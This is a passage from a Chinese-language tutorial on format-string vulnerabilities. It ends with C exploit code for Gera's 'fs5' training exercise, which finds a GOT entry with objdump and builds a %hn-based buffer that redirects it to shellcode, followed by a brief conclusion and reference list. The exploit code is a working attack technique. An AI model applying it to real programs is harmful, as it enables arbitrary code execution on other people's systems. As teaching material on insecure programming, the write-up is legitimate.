非安全编程演示之格式化字符串(2)

if(i == 30) {
printf("Can't find our format string in stack.\n");
printf("Some padding may be needed. Aborting...\n");
exit(1);
}

sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%08x", &deregister_address) != 1) {
pclose(f);
printf("Error: Cannot find deregister address in GOT!\n");
exit(1);
}
pclose(f);

printf("_deregister address in GOT is: 0x%08x\n",
deregister_address);
printf("shellcode address in stack is: 0x%08x\n\n", ret);

first_half = (ret & 0xffff0000) >> 16;
second_half= (ret & 0x0000ffff);

/* Evil buffer construction */
p = evil_buffer;
bzero(p, sizeof(evil_buffer));

/* first_half*/
*((void **)p) = (void *) (deregister_address + 2);
p += 4;

/* second_half */
*((void **)p) = (void *) (deregister_address);
p += 4;

sprintf(p, "%%.%ud%%%d$hn""%%.%ud%%%d$hn", first_half - 8, i + 1,
second_half - first_half, i + 2);
execle("/home/user/gera/fs5", "fs5", evil_buffer, NULL, env);
}

结论

Format strings 漏洞比较容易发现（相对而言缓冲区溢出有时候比较难发现，即便很仔细的检查了源代码）。自动检测工具检测代码中存在的漏洞通常是有用的。那么，为什么format strings漏洞被认为具有很大的威胁呢？原因在于它被引起重视的时间比较晚---直到2000。由于程序员一时偷懒，在很多旧的守护进程和应用程序中存在大量的format string bug。格式化字符串漏洞在将来不可避免的将带来很多安全问题。
参考
1. Gera, “Insecure Programming by Example”
http://community.core-sdi.com/~gera/InsecureProgramming/

2. scut, “Exploiting Format String Vulnerabilities”
http://www.team-teso.net/releases/formatstring-1.2.tar.gz

3. Aleph One, “Smashing The Stack For Fun and Profit”
http://www.phrack.com/phrack/49/P49-14

4. Linux Programmer's Manual, snprintf() function
http://www.die.net/doc/linux/man/man3/snprintf.3.html

5. Core Security Team, “Vulnerabilities
in your code – Advanced Buffer Overflows”
http://www.core-sec.com/examples/core_vulnerabilities.pdf